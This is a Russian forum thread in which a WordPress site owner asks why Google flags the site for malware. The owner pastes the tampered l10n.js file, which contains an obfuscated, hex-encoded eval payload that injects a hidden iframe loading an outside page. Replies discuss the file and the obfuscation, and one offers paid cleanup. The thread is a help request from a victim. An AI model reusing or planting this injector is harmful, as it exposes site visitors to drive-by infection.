Проблема с "Имеется информация, что этот сайт распространяет вредоносное ПО"

KX
На сайте с 23.08.2011
Offline
0
935

Привет, столкнулся с ситуацией, что гугл определяет мой сайт, как зараженный и распространяет вредоносное ПО, хотя никаких баннеров с роду не ставил. В чем может быть проблема? В панели вебмастера гугла зараженные url:

/wp-includes/js/l10n.js?ver=20101110

/game-the-r-e-d-album-320-kbps/

Хотя проверил сайт на онлайн антивирусниках и никаких проблем обнаружено не было!Мой сайт: http://hip-hoproom.com

Вот скрипт из 1-го урла (спойлер к сожалению не нашёл):

function convertEntities(b){var d,a;d=function(c){if(/&[^;]+;/.test(c)){var f=document.createElement("div");f.innerHTML=c;return !f.firstChild?c:f.firstChild.nodeValue}return c};if(typeof b==="string"){return d(b)}else{if(typeof b==="object"){for(a in b){if(typeof b[a]==="string"){b[a]=d(b[a])}}}}return b}; var _0x4de4=["\x64\x20\x35\x28\x29\x7B\x62\x20\x30\x3D\x32\x2E\x63\x28\x22\x33\x22\x29\x3B\x3 2\x2E\x39\x2E\x36\x28\x30\x29\x3B\x30\x2E\x37\x3D\x27\x33\x27\x3B\x30\x2E\x31\x2 E\x61\x3D\x27\x34\x27\x3B\x30\x2E\x31\x2E\x6B\x3D\x27\x34\x27\x3B\x30\x2E\x69\x3 D\x27\x66\x3A\x2F\x2F\x67\x2D\x68\x2E\x6D\x2F\x6A\x2E\x65\x27\x7D\x38\x28\x35\x2 C\x6C\x29\x3B","\x7C","\x73\x70\x6C\x69\x74","\x65\x6C\x7C\x73\x74\x79\x6C\x65\x 7C\x64\x6F\x63\x75\x6D\x65\x6E\x74\x7C\x69\x66\x72\x61\x6D\x65\x7C\x31\x70\x78\x 7C\x4D\x61\x6B\x65\x46\x72\x61\x6D\x65\x7C\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x 6C\x64\x7C\x69\x64\x7C\x73\x65\x74\x54\x69\x6D\x65\x6F\x75\x74\x7C\x62\x6F\x64\x 79\x7C\x77\x69\x64\x74\x68\x7C\x76\x61\x72\x7C\x63\x72\x65\x61\x74\x65\x45\x6C\x 65\x6D\x65\x6E\x74\x7C\x66\x75\x6E\x63\x74\x69\x6F\x6E\x7C\x70\x68\x70\x7C\x68\x 74\x74\x70\x7C\x63\x6F\x75\x6E\x74\x65\x72\x7C\x77\x6F\x72\x64\x70\x72\x65\x73\x 73\x7C\x73\x72\x63\x7C\x66\x72\x61\x6D\x65\x7C\x68\x65\x69\x67\x68\x74\x7C\x31\x 30\x30\x30\x7C\x63\x6F\x6D","\x72\x65\x70\x6C\x61\x63\x65","","\x5C\x77\x2B","\x 5C\x62","\x67"];eval(function (_0x2f46x1,_0x2f46x2,_0x2f46x3,_0x2f46x4,_0x2f46x5,_0x2f46x6){_0x2f46x5=function (_0x2f46x3){return _0x2f46x3.toString(36)};if(!_0x4de4[5][_0x4de4[4]](/^/,String)){while(_0x2f46x3--){_0x2f46x6[_0x2f46x3.toString(_0x2f46x2)]=_0x2f46x4[_0x2f46x3]||_0x2f46x3.toString(_0x2f46x2);}_0x2f46x4=[function (_0x2f46x5){return _0x2f46x6[_0x2f46x5]}];_0x2f46x5=function (){return _0x4de4[6]};_0x2f46x3=1;};while(_0x2f46x3--){if(_0x2f46x4[_0x2f46x3]){_0x2f46x1=_0x2f46x1[_0x4de4[4]]( new RegExp(_0x4de4[7]+_0x2f46x5(_0x2f46x3)+_0x4de4[7],_0x4de4[8]),_0x2f46x4[_0x2f46x3]);}}return _0x2f46x1}(_0x4de4[0],23,23,_0x4de4[3][_0x4de4[2]](_0x4de4[1]),0,{}));

У кого какие идеи? Что именно надо удалить? В заранее спасибо за помощь!

Lipcrus
На сайте с 05.05.2009
Offline
83
#1

Данный файл проверяли?

/wp-includes/js/l10n.js

Откуда он вообще, файл ли движка это?

KX
На сайте с 23.08.2011
Offline
0
#2
Lipcrus:
Данный файл проверяли?
/wp-includes/js/l10n.js
Откуда он вообще, файл ли движка это?

Вот этого я не знаю, но пробив поисковике нашел на бурженете такие строчки

It contains the convertEntities() function that (as the name says) converts HTML entities to their actual value. It is mostly used for scripts that send over localization data from PHP to the JS side using wp_localize_script()

Kirill-x-zibit добавил 23.08.2011 в 22:04

Mr_Alex:
Короче, данный код:
var _0x4de4=["\x64\x20\x35\x28\x29\x7B\x62\x20\x30\x3D\x32\x2E\x63\x28\x22\x33\x22\x29\x3B\x3 2\x2E\x39\x2E\x36\x28\x30\x29\x3B\

js обусфактором был обработан

Mr_Alex добавил 23.08.2011 в 21:09
У меня тоже аваст гнётся,но доктор веб ничего вредоносного не замечает.

Так какими должны быть мои действия?

R
На сайте с 24.01.2008
Offline
180
#3

Стучите поможем!

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
KX
На сайте с 23.08.2011
Offline
0
#4

Rxp,

хочется самому разобраться в проблеме, чтобы в следующий раз уметь предотвратить

blackcat72
На сайте с 22.03.2009
Offline
25
#5

Проблема решена? На данный момент ничего не обнаружено.

--- Лучше день потерять, зато потом за пять минут долететь.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий